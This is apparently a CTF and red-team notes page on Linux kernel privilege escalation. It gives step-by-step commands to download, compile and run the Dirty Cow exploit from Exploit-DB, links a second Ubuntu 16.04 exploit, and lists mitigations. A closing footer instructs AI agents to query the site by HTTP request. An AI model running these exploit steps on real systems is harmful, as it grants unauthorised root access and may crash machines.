# Kernel Exploits

## Enumeration

Enumerate kernel version and google it:

```bash
uname -a
```

Or, transfer `linux-exploit-suggester.sh` to the victim machine and run it. If the keyword "dirtycow" is in the output, try it.

## Dirty Cow

{% embed url="<https://dirtycow.ninja/>" %}
Dirty Cow
{% endembed %}

Dirty Cow is the most commonly used kernel exploit in CTF-like. The downside is that a failed Dirty Cow attack may crash the victim machine. This will be really bad in a real-world pentest scenario.

{% hint style="info" %}
Quote from the original bug report:

A **race condition** was found in the way the Linux kernel's memory subsystem handled the **copy-on-write (COW)** breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
{% endhint %}

Suppose we want to use exploit 40616 from Exploit-DB. On the victim machine, change to the `/tmp` directory:

```bash
cd /tmp
```

download it:

```bash
wget https://www.exploit-db.com/download/40616 -O cowroot.c
```

Following the instruction, uncomment a payload, and compile it:

```bash
gcc cowroot.c -o cowroot -pthread
```

Execute the exploit:

```bash
./cowroot
```

Make the shell more stable:

```bash
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
```

## Cheat Code: Ubuntu 16.04 Privesc

{% hint style="info" %}
Many Linux machines are vulnerable to this kernel exploit, so I call it the "cheat code" in Linux privilege escalation.
{% endhint %}

This kernel exploit works smoothly for many boxes:

{% embed url="<https://www.exploit-db.com/exploits/44298>" %}
Ubuntu 16.04 local privesc
{% endembed %}

## Mitigation

A successful privilege escalation through kernel exploits require the following 5 conditions:

1. A vulnerable kernel
2. A working exploit
3. A way to transfer the exploit to the target
4. A way to compile the exploit (optional since some exploits can be compiled on the attack machine)
5. A way to execute the exploit

Condition 1 and 2 are hard to prevent, hence we should focus on condition 3, 4, and 5. The mitigation ideas are:

* **Prevent transferring the exploit**
  * Do not allow users to use FTP, TFTP, SMB, SCP, wget, and curl
* **Remove compilation tools**
  * Remove GCC, CC, and other development tools.
* **Prevent exploit execution**
  * Mount directories such as `/tmp` and `/home` on a separete non-executable file system.
  * For existing executables, set `chmod 700 <executable>` if you don't want the user to execute it.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfnote/red-teaming/privilege-escalation/linux-privilege-escalation/kernel-exploits.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.